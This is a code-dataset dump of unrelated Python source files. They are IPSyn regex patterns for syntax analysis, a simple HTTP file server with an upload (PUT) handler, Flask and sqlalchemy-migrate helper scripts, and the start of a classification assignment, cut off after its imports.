Dataset schema (column: type / range):
blob_id: string (length 40)
directory_id: string (length 40)
path: string (length 3 to 281)
content_id: string (length 40)
detected_licenses: list (length 0 to 57)
license_type: string (2 classes)
repo_name: string (length 6 to 116)
snapshot_id: string (length 40)
revision_id: string (length 40)
branch_name: string (313 classes)
visit_date: timestamp[us]
revision_date: timestamp[us]
committer_date: timestamp[us]
github_id: int64 (18.2k to 668M, nullable)
star_events_count: int64 (0 to 102k)
fork_events_count: int64 (0 to 38.2k)
gha_license_id: string (17 classes)
gha_event_created_at: timestamp[us]
gha_created_at: timestamp[us]
gha_language: string (107 classes)
src_encoding: string (20 classes)
language: string (1 class)
is_vendor: bool (2 classes)
is_generated: bool (2 classes)
length_bytes: int64 (4 to 6.02M)
extension: string (78 classes)
content: string (length 2 to 6.02M)
authors: list (length 1)
author: string (length 0 to 175)
blob_id: e0a8665cf9424448e8382bfa43878fee2adaea9c | directory_id: 893f8236a63752f3f5ec8222fc334c73c0a05208 | path: /AC-IPSyn/source/Patterns_IPSyn.py | content_id: 3120dd2f8cc76c77000f15df008e06bc093c0db6 | detected_licenses: [] | license_type: no_license | repo_name: haewon-mit/Syntax-Analysis | snapshot_id: 0567e901fd61d244442779362f78ee9c391101d8 | revision_id: 75f766e7817f6be3ff700d31946ace8c6e8c38af | branch_name: refs/heads/master | visit_date: 2021-01-20T20:10:48.952924 | revision_date: 2016-06-08T16:17:57 | committer_date: 2016-06-08T16:17:57 | github_id: 60,710,511 | star_events_count: 0 | fork_events_count: 0 | gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null | src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 13,181 | extension: py | content:
#Purpose: This contains the regular expression patterns that will be used for
# extracting the constructs for the IPSyn structure.
Patterns={
#Proper,Mass or Count Noun
'N1':r'(\((NNS|NNPS|NN|NNP) ([^)]*)\))',
#Pronoun or prolocative excluding modifiers
'N2':r'(\((((PRP|WP) ([^)]*))|([W]?RB ([hH]ere|[Tt]here|[Ww]here|[Tt]hereafter|[Hh]ereafter|[Th]ereupon|[Hh]ereabouts|[Ww]hereabouts|[Ww]hereupon|[Tt]hereabouts|[Ss]omewhere|[Ee]verywhere)))\))',
#Modifier including adjectives, possessives and quantifiers
'N3':r'(\((DT|PRP\$|WP\$|JJ|JJR|JJS|CD|POS) ((?![Aa]\))(?![Aa]n\))(?![Tt]he\))[^)]+)\))',
#Two word NP: nominal preceded by article or modifier
'N4':r'(\((DT|RP|PRP\$|WP\$|JJ|JJR|JJS|CD|POS) ([^)]*)\) \((NNS|NNPS|NN|NNP) ([^)]*)\))',
#Article used before a noun
'N5':r'(\((DT) (([Aa])|([Aa]n)|([Tt]he))\) \((NNS|NNPS|NN|NNP) ([^)]*)\))',
#Two word NP(as in N4) after verb or preposition
'N6':r'(\((AUX|VB|VBD|VBG|VBN|VBP|VBZ|MD|(?<=\(PP \()IN|TO) ([^)]*)\)[ )]*(\((NP|ADJP) )+\((DT|RP|PRP\$|WP\$|JJ|JJR|JJS|CD|POS) ([^)]*)\) \((NNS|NNPS|NN|NNP) ([^)]*)\))',
#Plural Suffix (should end with s) - not looking for irregular plurals
'N7':r'(\((NNS|NNPS) ([^)]+s)\))',
#Two-word NP(as in N4) before verb
'N8':r'(\((DT|RP|PRP\$|WP\$|JJ|JJR|JJS|CD|POS) ([^)]*)\) \((NNS|NNPS|NN|NNP) ([^)]*)\))([ )]*)\((VP)? \((AUX|VB|VBD|VBG|VBN|VBP|VBZ|MD) ([^)]*)\)',
#Three word NP (Det-Mod-N or Mod-Mod-N)
'N9':r'(\(((PRP\$)|(WP\$)|(JJ)|(JJR)|(JJS)|(CD)|(POS)|(DT)) ([^)]*)\) \(((PRP\$)|(WP\$)|(JJ)|(JJR)|(JJS)|(CD)|(POS)) ([^)]*)\) \(((NNS)|(NNPS)|(NN)|(NNP)) ([^)]*)\))',
#Adverb modifying adjective or nominal
'N10':r'(((\(RB (?![Nn]ot\))(?![Nn]\'t\))([^)]+)\))([ )]*)(\(((NP)|(ADJP)) )?\((NN|NNS|NNP|NNPS|JJ|JJR|JJS|PRP|CD|DT|WP) ([^()]+)\))|(\((NN|NNS|NNP|NNPS|JJ|JJR|JJS|PRP|CD|WP) [^()]+\) \(RB ([^()]+)\))|(\(NP \(PDT ([^()]+)\)))',
#Other bound morphemes on Nouns or adjectives(not stored as a lexical unit)
'N11':r'(\((JJR|JJS|JJ) ((?!([Bb]etter)|([Oo]ther)|([Ss]uper)|([Bb]est)|([Ss]ister)|([Oo]ver)|([Uu]nder))(([Uu]n)?[^()]+((er)|(est)|(ies)|(ish)))|(([Uu]n)[^()]+((er)|(est)|(ies)|(ish))?))\))',
#Other not used
'N12':'',
#Verb
'V1':r'(\((AUX|VB|VBD|VBG|VBN|VBP|VBZ) ([^)]*)\))',
#Particle or preposition
#((?<=\(PP \()IN(?= [^)]+\) \(S))|
'V2':r'(\(((RP)|((?<=\(PP \()((IN)|(TO))(?= [^)]+\) \())|((?<=\(PP \()((IN)|(TO))(?! ([^)]+)\) \(S))) ([^)]*)\))',
#Prepositional Phrase (Prep + NP)
'V3':r'(\(PP \(((IN)|(TO)) ([^)]*)([ )]*)\(NP( \(([A-Z$]+) ([^)]*)\))+)',
#Copula linking two nominals
#NP VP NP or NP VP ADJP
'V4':r'((( [Ii\']s\))|( [Aa]re\))|( [Aa]m\))|( [Bb]e\))|( [Ww]ere\))|( [Bb]een\))|( [Bb]eing\))|( [Ww]as\))|( [Bb]ec[oa]me)|( [Bb]ecoming\))|( [Ss]eem))|(\(((NP)|(WHNP))( (\([A-Z$]+ ([^()]+)\))+)\) (\(VP ([A-Z]+ [^()]+)+? )?\((VP|SQ) \((AUX|VB|VBZ|VBG|VBN|VBD|VBP) ([^()]+)\) (\(RB [^()]+\) )?\(ADJP( \([A-Z$]+ ([^()]+)\))+\)))',
#Catenative (pseudo-auxiliary) preceding a verb
'V5':r'((gonna)|(hafta)|(wann?t?a)|(s\'pposedt?a))\)+ +\(VP \(((VB)|(AUX)) [^()]+\)',
#Auxiliary be, do, have in VP
'V6':r'(\(AUX (([dD](o|id|oing|ne))|([Bb](een|e|eing))|([Ii\']s)|([Aa\'](m|re))|([Ww](as|ere))|([Hh]a(d|s|ve|ving))))',
#Progressive suffix
'V7':r'(\(VP \((VBG) ([^()]+ing)\))',
#Adverb
'V8':r'(\(((RB)|(WRB|NP \(PDT)) ([^)]*)\))',
#Modal preceding verb
'V9':r'((\(VP \(MD ([^()]+)\) (\(RB [^()]+\) )?\(VP( \((\w+) ([^)]+)\))+\))|(\(SQ \(MD ([^ ()]+)\)( \(RB [^()]+\))?( \((\w+) ([^)]*)\))+\) \(VP( \((\w+) ([^)]*)\))+\)))',
#Third person singular present tense suffix
'V10':r'((\(VBZ ([^)]*)\))|(\(AUX (?![\']?s\))([^)]*s)\)))',
#Past tense modal
#Check for the list of all the modals in the PENN Tree bank
'V11':r'(\(MD ((?i:((could)|(would)|(should)|(might)|(must)|(need)|(ought)|(dared)|(\'ll))))\))',
#Regular past tense suffix
'V12':r'(\(VP \(VB[DN] ([^)]+ed)\))',
#Past tense auxiliary - only looking for Did, Was, Had
#Check the PENN Tree bank for the entire list
#Regular past tense ends with ed except for the irregular verbs
#Need to get a list of the irregular verbs
'V13':r'(\(AUX ((([Dd]id)|([Ww]as)|([Ww]ere)|([Hh]ad)|(\'d))|([^)]*[^e]ed))\))',
#Medial adverb
'V14':r'\n?.*?(\([A-Z$]+ [^()]+\).*?(W?RB|\(NP \(PDT) (?!not)([^()]+)(.*?\([A-Z$]+ [^()]+\)).*\n?)',
#Copula, Modal or Auxiliary for emphasis or ellipsis
#Look at this later
#Common - Yes - positive forms of the modal (no not present after modal)
# No - negative form of the modal present(not or n't present after modal/aux)
#Need to look at Copula verbs for ellipsis
'V15':r'(((\(RB [Yy]es\)) |(\((DT [Nn]o)\))).*?(\((MD|AUX) ([^)]*)\)))',
#Past tense copula
#Check for past tense auxiliaries?
'V16':r'((( [Ww]ere\))|( [Bb]een\))|( [Ww]as\))|( [Bb]ecame)|( [Ss]eemed))|(\(((NP)|(WHNP))( (\([A-Z$]+ ([^()]+)\))+)\) (\(VP ([A-Z]+ [^()]+)+? )?\((VP|SQ) \((VBD) ([^()]+)\) (\(RB [^()]+\) )?\(ADJP( \([A-Z$]+ ([^()]+)\))+\)))',
#r'(\((NP|WHNP)( (\((\w+) ([^)]+)\))+)\) \((VP|SQ) \(((AUX (([Dd]id)|([Ww]as)|([Hh]ad)|(\'d))|([^)]*[^e]ed))|(VBD ([^)]+)))\) \((ADJP|NP)( \((\w+) ([^)]+)\))+\))',
#Bound morpheme on a verb or adjective(to make an adverb)
#Need to get all the possible rules that go with this
'V17':r'\(((VB[^G]?)|(RB)) ((((?![Rr]emember)(?![Ii]nside)(?![Rr]ecord)(([Rr]e)|([Ii]n)|([Ee]n)|([uU]n)|([Mm]is)|([Tt]rans)|([eE]x)|([Dd]is))([^ ()]+))|((?![Oo]nly)([^ ()]+)(ly))))\)',
#r'\((VB|RB|VBZ|VBG|VBD|VBN|VBP|AUX|RB) (((un|re)(\w+)(ly)?)|((\w+)(ly))\))',
#Intonationally marked question
'Q1':r'((\(S. \((FRAG|NP|(S \(VP)).*(\. \?))+?)',
# Routine do/go or existence name question or wh-pronoun alone.
'Q2':r'((\(S. .*\(((WP(\$)?)|WHNP|WHADP|WHAVP|WHPP) [^)]+\).*(\. \?))+?)',
#Simple negation + X: neg = no(t), can't, don't; X = NP, PP, VP, Adj, Adv, etc.
'Q3':r'((\(S..*\((RB|DT) ([Nn](o|ot|\'t|ever))\).*\(\. [?.!]\))+?)',
#Initial Wh-pronoun followed by verb
'Q4':r'((\(S. (\(([A-Z$]+ ))+(\(WP(\$)? ([^)]+)\))[ )]*(\(([A-Z$]+ ))*\((AUX|VB|VBD|VBP|VBN|VBG|VBZ|MD).*(\. \?))+?)',
#Negative Morpheme between subject and verb
'Q5':r'((\(S. (\(S \(NP.*(\(VP(\)| )+((\(((AUX)|(MD)) [^)]+\))? \(RB ((\'nt)|(not)|(n\'t))\) \(VP).*))\(\. [!.?]\))+?)',
#Wh-question with inverted modal, copula or auxiliary
'Q6':r'((\(S. \(SBARQ.*\(SQ.*(\. \?))+?)',
#Negation of copula, modal or auxiliary
'Q7':r'(\(S1.*(\(VP \(((AUX)|(MD)) [^)]+\) (\(ADVP )?\(RB ((not)|(n\'t)|(\'nt)|(never))\)(.*))\(\. [.!?]\))+?',
#r'((\(S. .*\(((AUX)|(MD)) [^)]+\) \(RB ((not)|(n\'t)).*(\. \?))+?)',
#Yes/no question with inverted modal, copula or auxiliary
'Q8':r'((\(S. \(SQ.*(\. \?))+?)',
#Why, When, Which, Whose
'Q9':r'((\(S. (\(([A-Z$]+ ))+([Ww](hy|hen|hich|hose)).*(\. \?))+?)',
# Tag Question
'Q10':r'(\(S1((?!( \(S((Q)|(BARQ)))).*) \(, ,\) (.*)\(\. \?\))+?',
#Other: e.g questions with negation and inverted cop/aux/modal
'Q11':r'((\(S. .*\(((SBARQ)|((SQ)?)|(S)|(SINV)) (?!\(NP).*\((SQ ).*(\(((AUX)|(MD)) [^)]+\) \(RB ((not)|(n\'t))).*(\. \?\)))+?)',
# Two word combination
'S1':r'((\(S..*\(\. [.!?]\))+?)',
# Subject verb sequence
'S2':r'(\n?.*?\(S ((\(NP [^\n]*\(VP.*\n?)))',
# Verb object sequence
'S3':r'(\n?.*?(\(VP.*?\(NP.*\n?))',
# Subject Verb Object Sequence
'S4':r'(\n?.*?\(S ((\(NP [^\n]*\(VP.*?\(NP.*\n?)))',
# Conjunction(any)
#'S5':r'(S. .*((\(CC)|((?<!\(PP )\(IN(?= ([^)]+)\) \(S))) ([^)]+)\).*\(\. [!?.]\))+?',
'S5':r'(S. .*((((\(CC)|((?<!\(PP )\(IN(?= ([^)]+)\) \(S))) ([^)]+)\))|(\(CONJP( \([A-Z$1-9]+ [^)]+\))+\))).*\(\. [!?.]\))+?',
# Sentence with two VP's
'S6':r'((\(S. .*(.*(\((VB|VBZ|VBP|VBN|VBD) ([^)]+)\).*?){2,}.*)\(\. [.!?]\))+?)',
# Conjoined phrases
'S7':r'((\(S. .*?\([A-Z]+ (\((?P<i>[A-Z]{2,})[A-Z$]? [^)(]+\)(( \(CC [^)]+\) \((?P=i).{,2} [^()]+\)))+)\)?.*\(\. [.!?]\))+?)',
# Infinitive without catenative marked with to
'S8':r'((S. .*(\(VP.*?(?=\((VB[GPNZD]?)|(AUX) ).*?\(VP.*?TO.*(?=\(VP.*?\(((VB)|(AUX)) ).*\(\. [!?.]\)))+?)',
# Let/Make/Help/Watch introducer
'S9':r'((\(S. (\([A-Z$1-9]+ )+(\(((RB)|(UH)) [^()]+\)+ )?\(VP \(VB (([Ll]et)|([Hh]elp)|([Mm]ake))\).*\((VB|VBD|VBZ|VBN|VBP|VBG|AUX).*\(\. [.?!]\))+?)',
# Adverbial Conjunction
'S10':r'(S. .*((((\(CC)|((?<!\(PP )\(IN(?= ([^()]+)\) \(S))) ([^()]+)\))|(\(CONJP( \([A-Z$1-9]+ [^()]+\))+\))).*\(\. [!?.]\))+?',
# Propositional Complement
# Need to get a list of words
'S11':r'(\(S1.*\(VP \(VB.? ((mean)|(forget)|(forgot)|(say)|(said)|(tell)|(told)|(guess)|(know)|(knew)|(remember)|(wonder)|(judj)|(use)|(using)|(show)|(think)|(thought))[^()]*\) (\(SBAR ((\([A-Z]+ )+\([A-Z$]+ [^()]+\)\) )?\(S \(NP.*)\(\. [.!?]\))+?',
# Conjoined sentences (Except for imperatives, will usually have subj + predicate in each clause)
#Left to consider Wh conjunctives - right now have considered CC and IN conjunctives
'S12':r'(S. (((?=\(((S)|(SBAR)|(SBARQ)|(SINV)|(SQ)|(VP)) )(.*)(((?<=\){2} )\(CC)|((?<!\(PP )\(((S)|(SBAR)|(SBARQ)|(SINV)|(SQ)|(VP)) IN(?= ([^)]+)\) \(S))) [^)]+\) (\((S|SBAR|SBARQ|SINV|VP) .*))+)\(\. [.!?]\))+?',
# Wh-clause
'S13':r'((\(S. .*\(((SBAR(Q)?)|SINV|SQ|S) \(((WHNP)|(WHADJP)|(WHADVP)|(WHPP)).*\(\. [.!?]\))+?)',
# Bitransitive predicate
'S14':r'(\(S1.*(\(VP (\(VB[GDPNZ]? [^()]+\))+\)* *\(NP (\([A-Z]+ [^()]+\))+\) *?(\(PP \(((IN)|(TO)) ((to)|(for))]+\) )?\(NP \((?!RB)[A-Z]+ (?!(tonight)|(tomorrow)|(today))[^()]+\)( \([A-Z]+ [^()]+\))*\)* *?.*)\(\. [.!?]\))+?',
# Sentence with three or more VPs
'S15':r'((\(S..*(.*(\((VB|VBZ|VBP|VBN|VBD|AUX) ([^)]+)\).*){3,}.*)\(\. [.!?]\))+?)',
# Relative clause marked or unmarked
'S16':r'(\(S1 .*?(\(NP .*?(\(SBAR (?!\(IN ).*?\(S .*))+\(\. [?.!]\)+)+?',
# Infinitive clause new subject
'S17':r'(\(S1.*\(VP( \((?!VBG)[A-Z]+ [^()]+\))+( (\(S )\(NP( \([A-Z$]+ [^()]+\))+\)+ *\(VP \(TO to\) \(VP \(((VB)|(AUX)) [^()]+\).*)\(\. [?!.]\))+?',
# Gerund
'S18':r'((\(.*\(VBG.*\(\. [.!?]\))+?)',
# Fronted or center-embedded subordinate clause
'S19':r'((\(.*?(\(SBAR (\(IN [^)]+\) )?\(S.*)\(\. [?.!]\)+)+?)',
# Other: e.g passive constructions e.g tag comments/intrusions
'S20':r''
}
Nouns=["N1","N2","N3","N4","N5","N6","N7","N8","N9","N10","N11","N12"]
Verbs=["V1","V2","V3","V4","V5","V6","V7","V8","V9","V10","V11","V12","V13","V14","V15","V16","V17"]
Questions=["Q1","Q2","Q3","Q4","Q5","Q6","Q7","Q8","Q9","Q10","Q11"]
Sentences=["S1","S2","S3","S4","S5","S6","S7","S8","S9","S10","S11","S12","S13","S14","S15","S16","S17","S18","S19","S20"]
Description={
'N1':"Proper Mass or Count Noun",
'N2':"Pronoun,Prolocative excluding modifiers",
'N3':"Modifier including adjectives, possessives and quantifiers",
'N4':"Two word NP preceded by article or modifier",
'N5':"Article used before a noun",
'N6':"Two word NP(as in N4) after verb or preposition",
'N7':"Plural suffix",
'N8':"Two word NP (as in N4) before verb",
'N9':"Three word NP (Det-Mod-N or Mod-Mod-N)",
'N10':"Adverb modifying adjective or nominal",
'N11':"Any other bound morpheme on N or adjective (if judged not to be stored as a lexical unit)",
'N12':"Others",
'V1':"Verb",
'V2':"Particle or preposition",
'V3':"Prepositional Phrase (Prep+NP)",
'V4':"Copula linking two nominals (nominal + copula + nominal, copula)",
'V5':"Catenative (pseudo-auxiliary) preceding a verb (catenative, verb)",
'V6':"Auxiliary be, do, have in VP",
'V7':"Progressive Suffix",
'V8':"Adverb",
'V9':"Modal preceding verb",
'V10':"Third person singular present tense suffix",
'V11':"Past tense modal",
'V12':"Regular past tense suffix",
'V13':"Past tense auxiliary",
'V14':"Medial adverb",
'V15':"Copula, Modal or Auxiliary used for emphasis or ellipsis(uncontractible context)",
'V16':"Past tense copula",
'V17':"Bound morpheme on a verb or an adjective(to make an adverb)",
'Q1':"Intonationally marked question",
'Q2':"Routine do/go existence name question or wh-pronoun alone",
'Q3':"Simple negation + X: neg = no(t), can't, don't; X = NP, PP, VP, Adj, Adv, etc.",
'Q4':"Initial Wh-pronoun followed by verb",
'Q5':"Negative Morpheme between subject and verb",
'Q6':"Wh-question with inverted modal, copula or auxiliary",
'Q7':"Negation of copula, modal or auxiliary",
'Q8':"Yes/no question with inverted modal, copula or auxiliary",
'Q9':"Why, When, Which, Whose",
'Q10':"Tag Question",
'Q11':"Other: e.g questions with negation and inverted cop/aux/modal",
'S1':"Two word combination",
'S2':"Subject verb sequence",
'S3':"Verb object sequence",
'S4':"Subject Verb Object Sequence",
'S5':"Conjunction (any)",
'S6':"Sentence with two VP's",
'S7':"Conjoined phrases",
'S8':"Infinitive without catenative, marked with to",
'S9':"Let/Make/Help/Watch introducer",
'S10':"Adverbial Conjunction",
'S11':"Propositional Complement",
'S12':"Conjoined sentences (Except for imperatives, will usually have subj + predicate in each clause)",
'S13':"Wh-clause",
'S14':"Bitransitive predicate",
'S15':"Sentence with three or more VPs",
'S16':"Relative clause marked or unmarked",
'S17':"Infinitive clause new subject",
'S18':"Gerund",
'S19':"Fronted or center-embedded subordinate clause",
'S20':"Other: e.g passive constructions e.g tag comments/intrusions"
}
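# --- Illustrative usage sketch (not part of the original module). It assumes the input is a
# bracketed Penn-Treebank-style parse string, e.g.
# "(S1 (S (NP (DT the) (NN dog)) (VP (VBZ runs))) (. .))".
import re

def count_constructs(parse_line):
    """Count how many times each IPSyn pattern above fires on one parsed utterance."""
    counts = {}
    for name, pattern in Patterns.items():
        if pattern:  # N12 and S20 are intentionally left empty
            counts[name] = len(re.findall(pattern, parse_line))
    return counts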
authors: ["personalrobots@personals-mbp-2.media.mit.edu"] | author: personalrobots@personals-mbp-2.media.mit.edu
blob_id: b7eb0a6c17571f95eecb2d8d0106738004e2c7d0 | directory_id: 18e9bbc8747f4edca0c96e522bbd6dde48a60966 | path: /lang/py/detail/simphttp.py | content_id: 09b6e116f9042b84864db836a4576b3fee95fbb5 | detected_licenses: [] | license_type: no_license | repo_name: leizton/inote | snapshot_id: 6290be44b0fcb4d182c4b031ed95de6bdc736de8 | revision_id: c8114b3d46cb14a1bf9d431a765e203685cc3882 | branch_name: refs/heads/master | visit_date: 2023-08-31T04:22:43.517404 | revision_date: 2023-08-17T09:37:22 | committer_date: 2023-08-17T09:37:22 | github_id: 111,563,245 | star_events_count: 0 | fork_events_count: 0 | gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null | src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 8,867 | extension: py | content:
"""Simple HTTP Server.
This module builds on BaseHTTPServer by implementing the standard GET
and HEAD requests in a fairly straightforward manner.
"""
import os
import posixpath
import BaseHTTPServer
import SocketServer
import urllib
import cgi
import sys
import shutil
import mimetypes
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
__version__ = "0.6"
class SimpHttpRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
"""Simple HTTP request handler with GET and HEAD commands.
This serves files from the current directory and any of its
subdirectories. The MIME type for files is determined by
calling the .guess_type() method.
The GET and HEAD requests are identical except that the HEAD
request omits the actual contents of the file.
"""
server_version = "SimpleHTTP/" + __version__
def do_PUT(self):
# open
try:
path = self.translate_path(self.path)
out = open(path, 'wb')
except:
out = None
if not out:
self.send_result(500, "open exception")
return
# write
try:
remain = int(self.headers['content-length'])
while remain > 0:
buf = self.rfile.read(min(remain, 1024))
remain -= len(buf)
out.write(buf)
except:
self.send_result(500, "write exception")
return
# close
try:
out.close()
self.send_result(200, "ok")
except:
self.send_result(500, "close exception")
def send_result(self, code, info):
f = StringIO()
f.write(info)
self.send_response(code)
self.send_header("Content-type", "text/html")
self.send_header("Content-Length", f.tell())
self.end_headers()
f.seek(0)
self.copyfile(f, self.wfile)
f.close()
def do_GET(self):
"""Serve a GET request."""
f = self.send_head()
if f:
try:
self.copyfile(f, self.wfile)
finally:
f.close()
def do_HEAD(self):
"""Serve a HEAD request."""
f = self.send_head()
if f:
f.close()
def send_head(self):
"""Common code for GET and HEAD commands.
This sends the response code and MIME headers.
Return value is either a file object (which has to be copied
to the outputfile by the caller unless the command was HEAD,
and must be closed by the caller under all circumstances), or
None, in which case the caller has nothing further to do.
"""
path = self.translate_path(self.path)
f = None
if os.path.isdir(path):
if not self.path.endswith('/'):
# redirect browser - doing basically what apache does
self.send_response(301)
self.send_header("Location", self.path + "/")
self.end_headers()
return None
for index in "index.html", "index.htm":
index = os.path.join(path, index)
if os.path.exists(index):
path = index
break
else:
return self.list_directory(path)
ctype = self.guess_type(path)
try:
# Always read in binary mode. Opening files in text mode may cause
# newline translations, making the actual size of the content
# transmitted *less* than the content-length!
f = open(path, 'rb')
except IOError:
self.send_error(404, "File not found")
return None
try:
self.send_response(200)
self.send_header("Content-type", ctype)
fs = os.fstat(f.fileno())
self.send_header("Content-Length", str(fs[6]))
self.send_header("Last-Modified", self.date_time_string(fs.st_mtime))
self.end_headers()
return f
except:
f.close()
raise
def list_directory(self, path):
"""Helper to produce a directory listing (absent index.html).
Return value is either a file object, or None (indicating an
error). In either case, the headers are sent, making the
interface the same as for send_head().
"""
try:
list = os.listdir(path)
except os.error:
self.send_error(404, "No permission to list directory")
return None
list.sort(key=lambda a: a.lower())
f = StringIO()
displaypath = cgi.escape(urllib.unquote(self.path))
f.write('<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">')
f.write("<html>\n<title>Directory listing for %s</title>\n" % displaypath)
f.write("<body>\n<h2>Directory listing for %s</h2>\n" % displaypath)
f.write("<hr>\n<ul>\n")
for name in list:
fullname = os.path.join(path, name)
displayname = linkname = name
# Append / for directories or @ for symbolic links
if os.path.isdir(fullname):
displayname = name + "/"
linkname = name + "/"
if os.path.islink(fullname):
displayname = name + "@"
# Note: a link to a directory displays with @ and links with /
f.write('<li><a href="%s">%s</a>\n'
% (urllib.quote(linkname), cgi.escape(displayname)))
f.write("</ul>\n<hr>\n</body>\n</html>\n")
length = f.tell()
f.seek(0)
self.send_response(200)
encoding = sys.getfilesystemencoding()
self.send_header("Content-type", "text/html; charset=%s" % encoding)
self.send_header("Content-Length", str(length))
self.end_headers()
return f
def translate_path(self, path):
"""Translate a /-separated PATH to the local filename syntax.
Components that mean special things to the local file system
(e.g. drive or directory names) are ignored. (XXX They should
probably be diagnosed.)
"""
# abandon query parameters
path = path.split('?',1)[0]
path = path.split('#',1)[0]
# Don't forget explicit trailing slash when normalizing. Issue17324
trailing_slash = path.rstrip().endswith('/')
path = posixpath.normpath(urllib.unquote(path))
words = path.split('/')
words = filter(None, words)
path = os.getcwd()
for word in words:
drive, word = os.path.splitdrive(word)
head, word = os.path.split(word)
if word in (os.curdir, os.pardir): continue
path = os.path.join(path, word)
if trailing_slash:
path += '/'
return path
def copyfile(self, source, outputfile):
"""Copy all data between two file objects.
The SOURCE argument is a file object open for reading
(or anything with a read() method) and the DESTINATION
argument is a file object open for writing (or
anything with a write() method).
The only reason for overriding this would be to change
the block size or perhaps to replace newlines by CRLF
-- note, however, that the default server uses this
to copy binary data as well.
"""
shutil.copyfileobj(source, outputfile)
def guess_type(self, path):
"""Guess the type of a file.
Argument is a PATH (a filename).
Return value is a string of the form type/subtype,
usable for a MIME Content-type header.
The default implementation looks the file's extension
up in the table self.extensions_map, using application/octet-stream
as a default; however it would be permissible (if
slow) to look inside the data to make a better guess.
"""
base, ext = posixpath.splitext(path)
if ext in self.extensions_map:
return self.extensions_map[ext]
ext = ext.lower()
if ext in self.extensions_map:
return self.extensions_map[ext]
else:
return self.extensions_map['']
if not mimetypes.inited:
mimetypes.init() # try to read system mime.types
extensions_map = mimetypes.types_map.copy()
extensions_map.update({
'': 'application/octet-stream', # Default
'.py': 'text/plain',
'.c': 'text/plain',
'.h': 'text/plain',
})
# nohup python simphttp.py 8000 &
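# Hypothetical client call for the PUT handler above (assuming the server was started on
# port 8000 as in the line above): curl -X PUT --data-binary @local.txt http://localhost:8000/remote.txt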
if __name__ == '__main__':
port = 10000
if len(sys.argv) > 1:
port = int(sys.argv[1])
httpd = SocketServer.TCPServer(("", port), SimpHttpRequestHandler)
print "serving at port:", port
httpd.serve_forever()
authors: ["leizton@126.com"] | author: leizton@126.com
blob_id: 401caa772c709306a860945e1a837247a57746a2 | directory_id: cd38e69551eb8c205690aa29e21be414d32613b6 | path: /manage.py | content_id: 009fcccf4ca0e26a657de5b0ba0ef3ef39e8e1ef | detected_licenses: [] | license_type: no_license | repo_name: fj-fj-fj/weather-api | snapshot_id: d779c6b2e5ef917be843cf6aba4d514eb84399d1 | revision_id: b364e50e031c3740f9c16139e408d82ac45754df | branch_name: refs/heads/main | visit_date: 2023-04-14T03:00:38.418507 | revision_date: 2021-04-25T11:32:06 | committer_date: 2021-04-25T11:32:06 | github_id: 355,349,080 | star_events_count: 0 | fork_events_count: 0 | gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null | src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 117 | extension: py | content:
from main import * # noqa: F403, F401
from weather.app import manager
if __name__ == '__main__':
    manager.run()
authors: ["berendeyzhiv@gmail.com"] | author: berendeyzhiv@gmail.com
blob_id: 4523042c199bfcef8e6db6475c59c6e2502fe508 | directory_id: 037cf499131b335c8721c75620d835cdcbca63d7 | path: /makemigrations.py | content_id: 278ac19d6b905743aa51d89cf6c96df6e8138f14 | detected_licenses: [] | license_type: no_license | repo_name: mihai-dobre/homework | snapshot_id: 35e38028785b485e06e7da704fca4a91563a63f6 | revision_id: a550d7044c664e1c56c092f4de3bf0539d069cd3 | branch_name: refs/heads/master | visit_date: 2021-01-23T04:53:23.602698 | revision_date: 2017-09-05T17:17:45 | committer_date: 2017-09-05T17:17:45 | github_id: 102,453,665 | star_events_count: 0 | fork_events_count: 0 | gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null | src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 879 | extension: py | content:
#!/home/mido/.virtualenvs/homework/bin/python
import imp
from migrate.versioning import api
from app import db
from config import SQLALCHEMY_DATABASE_URI
from config import SQLALCHEMY_MIGRATE_REPO
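# Summary: this script snapshots the model recorded in the sqlalchemy-migrate repository,
# diffs it against the current db.metadata, writes the resulting migration script under
# SQLALCHEMY_MIGRATE_REPO/versions/, and then upgrades the database to the new version.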
v = api.db_version(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO)
migration = SQLALCHEMY_MIGRATE_REPO + ('/versions/%03d_migration.py' % (v+1))
tmp_module = imp.new_module('old_model')
old_model = api.create_model(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO)
exec(old_model, tmp_module.__dict__)
script = api.make_update_script_for_model(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO, tmp_module.meta, db.metadata)
open(migration, "wt").write(script)
api.upgrade(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO)
v = api.db_version(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO)
print('New migration saved as ' + migration)
print('Current database version: ' + str(v))
authors: ["mihai.dobre@cegeka.com"] | author: mihai.dobre@cegeka.com
blob_id: 274b4e2ca3abe691d126c2277da8731025cc44ce | directory_id: a18324874df3083fe63430963ac98e0b056b3bab | path: /assignment2/a_classification.py | content_id: 9d65f2438785f76eeb5d5cdc503f300d481e2dc8 | detected_licenses: [] | license_type: no_license | repo_name: noah-sealy-fdl-2021/VisualAnalyticsProjects | snapshot_id: 16a95ce985aaa4c7c4b3fdc4dc2d3d3574b90695 | revision_id: f227e13a4b99bc724568316e34f9864aa1e39406 | branch_name: refs/heads/main | visit_date: 2023-03-18T17:52:50.473708 | revision_date: 2021-03-13T07:04:31 | committer_date: 2021-03-13T07:04:31 | github_id: 347,287,766 | star_events_count: 0 | fork_events_count: 0 | gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null | src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 24,531 | extension: py | content:
from pathlib import Path
from typing import List, Dict
import pandas as pd
import numpy as np
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import LabelEncoder
from sklearn.tree import DecisionTreeClassifier
from assignments.assignment1.a_load_file import read_dataset
from assignments.assignment1.b_data_profile import get_column_mean
